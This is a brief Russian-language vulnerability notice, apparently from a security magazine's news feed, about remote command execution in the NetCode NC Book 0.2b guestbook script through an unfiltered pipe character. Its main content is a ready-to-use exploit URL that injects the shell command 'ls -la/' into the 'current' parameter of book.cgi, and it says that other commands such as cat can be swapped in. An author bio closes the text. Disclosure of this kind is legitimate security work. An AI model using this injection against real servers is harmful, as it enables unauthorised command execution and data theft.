Выполнение кода в NetCode NC Book

Уязвимость в основном сценарии guestbook позволяет выполнить любые команды на сервере (нефильтруемый '|').

Уязвимость работает в NetCode NC Book 0.2b.

Эксплоит (выводит содержание корневой директории, можно добавить любые команды типа ls, cat и т.п):

http://target/cgi-bin/ncbook/ book.cgi?action=default&current=|ls  -la/|&form_tid=996604045&prev=
main.html&list_message_index=10

Анатолий Ализар: Бывший автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.